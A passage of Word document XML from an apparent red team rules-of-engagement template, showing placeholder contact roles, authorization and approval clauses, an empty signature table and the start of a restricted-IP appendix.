      <w:hyperlink r:id="rId82" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>joe@iheartredteams.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E789019" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trusted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Mr. Blah Phisher, 123.456.7890, </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>blah.phisher@customer.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="023CF8A9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">System </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: (REPRESENTATIVE) (PHONE) (EMAIL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C1C3F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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lastRenderedPageBreak/>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Director</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: (REPRESENTATIVE) (PHONE) (EMAIL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69748736" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">White Cell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lead</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: (REPRESENTATIVE) (PHONE) (EMAIL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367409CB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CEO</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: (REPRESENTATIVE) (PHONE) (EMAIL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA88F29" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>AUTHORIZATION</w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:anchor="authorization" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0988C647" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>This agreement becomes effective upon the date of the last approving official's signature. Termination of this agreement can be directed by any of the stakeholders listed in this document at any time by giving notice in writing to the non-terminating parties. This agreement can only be modified by mutual written consent of the signatories. Changes must be coordinated by means of an exchange of memoranda between the signatories. This agreement will undergo a review in its entirety with each modification request or by the request of either party after giving notice in writing at least 7 days prior to the review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B55FA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>APPROVAL</w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:anchor="approval" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C8E3CE7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The signatures below denote that all parties have read and agree to this Memorandum of Agreement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C31EAC" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Sign with signature authority from red team and target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>organization</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1058"/>
        <w:gridCol w:w="1160"/>
        <w:gridCol w:w="2066"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB134D" w:rsidRPr="00BB134D" w14:paraId="4F413E6D" w14:textId="77777777" w:rsidTr="00BB134D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="337C5B2A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C23A51" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB134D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A440A04" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB134D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Target / Customer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB134D" w:rsidRPr="00BB134D" w14:paraId="11D5BB96" w14:textId="77777777" w:rsidTr="00BB134D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1504C8EC" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB134D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="739CB9BB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8E3D62" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB134D" w:rsidRPr="00BB134D" w14:paraId="71DD16F8" w14:textId="77777777" w:rsidTr="00BB134D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F8A1AF2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB134D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00388B43" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1443388C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB134D" w:rsidRPr="00BB134D" w14:paraId="2ACEF012" w14:textId="77777777" w:rsidTr="00BB134D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49C71492" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB134D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="756D076B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72C280AA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB134D" w:rsidRPr="00BB134D" w14:paraId="3BFD9E08" w14:textId="77777777" w:rsidTr="00BB134D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FDCB52F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB134D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="311FB354" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="282F5C88" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BA45D78" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="1B680923">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA27FCA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:anchor="appendix-a" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="640D2EE3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>List of assets, systems and data Restricted IP Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCB7BE" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Restricted IP Assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B1E8D7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E3A67" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
